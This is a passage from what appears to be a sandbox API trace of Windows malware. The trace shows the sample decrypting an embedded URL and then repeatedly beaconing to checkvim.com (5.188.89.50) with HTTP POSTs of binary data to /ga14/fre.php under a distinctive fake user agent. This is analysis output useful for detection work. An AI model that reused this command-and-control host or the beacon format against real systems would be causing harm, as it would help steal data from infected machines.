| out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0323.895] closesocket (s=0x588) returned 0 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0323.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x13a0) returned 0x588 [0323.897] Sleep (dwMilliseconds=0xea60) [0323.909] GetProcessHeap () returned 0x840000 [0323.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0323.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.910] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0323.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.924] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0323.930] GetProcessHeap () returned 0x840000 [0323.930] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0323.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.931] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0323.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.933] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0323.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.934] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.934] GetProcessHeap () returned 0x840000 [0323.934] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0323.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.935] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0323.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.936] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0323.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.937] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0323.937] GetProcessHeap () returned 0x840000 [0323.937] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0323.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.942] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0323.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.943] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0323.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.944] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0323.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.945] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0323.945] GetProcessHeap () returned 0x840000 [0323.945] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0323.945] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0323.946] GetProcessHeap () returned 0x840000 [0323.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0323.946] GetProcessHeap () returned 0x840000 [0323.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0323.946] GetProcessHeap () returned 0x840000 [0323.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0323.946] GetProcessHeap () returned 0x840000 [0323.946] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0323.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.947] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0323.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.952] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0323.958] GetProcessHeap () returned 0x840000 [0323.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0323.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.959] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0323.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.960] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0323.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.961] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.961] GetProcessHeap () returned 0x840000 [0323.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0323.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.962] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0323.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.964] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0323.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.965] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0323.965] GetProcessHeap () returned 0x840000 [0323.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0323.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.966] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0323.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.967] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0323.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.968] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0323.968] GetProcessHeap () returned 0x840000 [0323.968] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0323.968] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0323.971] GetProcessHeap () returned 0x840000 [0323.971] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b68 [0323.971] socket (af=2, type=1, protocol=6) returned 0x58c [0323.971] connect (s=0x58c, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0324.036] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0324.036] GetProcessHeap () returned 0x840000 [0324.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0324.036] GetProcessHeap () returned 0x840000 [0324.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0324.036] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0324.037] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0324.037] GetProcessHeap () returned 0x840000 [0324.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0324.037] GetProcessHeap () returned 0x840000 [0324.037] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0324.037] GetProcessHeap () returned 0x840000 [0324.038] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fab8 [0324.038] GetProcessHeap () returned 0x840000 [0324.038] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0324.038] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0324.039] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0324.039] GetProcessHeap () returned 0x840000 [0324.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0324.039] GetProcessHeap () returned 0x840000 [0324.040] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0324.040] send (s=0x58c, buf=0x873a58*, len=237, flags=0) returned 237 [0324.040] send (s=0x58c, buf=0x87eb58*, len=159, flags=0) returned 159 [0324.040] GetProcessHeap () returned 0x840000 [0324.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0324.040] recv (in: s=0x58c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0324.391] GetProcessHeap () returned 0x840000 [0324.391] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0324.391] GetProcessHeap () returned 0x840000 [0324.391] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0324.391] GetProcessHeap () returned 0x840000 [0324.391] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0324.391] GetProcessHeap () returned 0x840000 [0324.391] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0324.392] closesocket (s=0x58c) returned 0 [0324.392] GetProcessHeap () returned 0x840000 [0324.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b68 | out: hHeap=0x840000) returned 1 [0324.392] GetProcessHeap () returned 0x840000 [0324.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0324.392] GetProcessHeap () returned 0x840000 [0324.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0324.392] GetProcessHeap () returned 0x840000 [0324.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0324.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1088) returned 0x58c [0324.394] Sleep (dwMilliseconds=0xea60) [0324.408] GetProcessHeap () returned 0x840000 [0324.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0324.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.409] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0324.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.416] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0324.422] GetProcessHeap () returned 0x840000 [0324.422] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0324.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.424] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0324.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.425] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0324.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.426] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.426] GetProcessHeap () returned 0x840000 [0324.426] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0324.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.427] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0324.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.428] CryptDestroyKey (hKey=0x87e270) returned 1 [0324.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.429] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0324.429] GetProcessHeap () returned 0x840000 [0324.429] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0324.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.432] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.433] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.434] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.434] GetProcessHeap () returned 0x840000 [0324.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0324.434] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0324.434] GetProcessHeap () returned 0x840000 [0324.434] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0324.434] GetProcessHeap () returned 0x840000 [0324.434] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0324.434] GetProcessHeap () returned 0x840000 [0324.434] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0324.434] GetProcessHeap () returned 0x840000 [0324.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0324.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.435] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0324.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.443] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0324.449] GetProcessHeap () returned 0x840000 [0324.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0324.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.450] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0324.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.451] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0324.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.452] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.452] GetProcessHeap () returned 0x840000 [0324.452] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0324.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.453] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0324.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.454] CryptDestroyKey (hKey=0x87e870) returned 1 [0324.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.456] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0324.457] GetProcessHeap () returned 0x840000 [0324.457] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0324.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.458] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0324.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.459] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0324.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.460] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0324.460] GetProcessHeap () returned 0x840000 [0324.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0324.460] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0324.461] GetProcessHeap () returned 0x840000 [0324.461] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0324.461] socket (af=2, type=1, protocol=6) returned 0x590 [0324.462] connect (s=0x590, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0324.538] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0324.538] GetProcessHeap () returned 0x840000 [0324.538] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0324.539] GetProcessHeap () returned 0x840000 [0324.539] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0324.539] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0324.540] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0324.540] GetProcessHeap () returned 0x840000 [0324.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0324.540] GetProcessHeap () returned 0x840000 [0324.540] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0324.540] GetProcessHeap () returned 0x840000 [0324.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0324.540] GetProcessHeap () returned 0x840000 [0324.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0324.541] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0324.542] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0324.542] GetProcessHeap () returned 0x840000 [0324.542] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0324.542] GetProcessHeap () returned 0x840000 [0324.542] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0324.542] send (s=0x590, buf=0x873a58*, len=237, flags=0) returned 237 [0324.542] send (s=0x590, buf=0x87eb58*, len=159, flags=0) returned 159 [0324.543] GetProcessHeap () returned 0x840000 [0324.543] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0324.543] recv (in: s=0x590, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0324.906] closesocket (s=0x590) returned 0 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0324.906] GetProcessHeap () returned 0x840000 [0324.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0324.907] GetProcessHeap () returned 0x840000 [0324.907] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0324.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb0) returned 0x590 [0324.909] Sleep (dwMilliseconds=0xea60) [0324.936] GetProcessHeap () returned 0x840000 [0324.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0324.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.937] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0324.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.943] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, 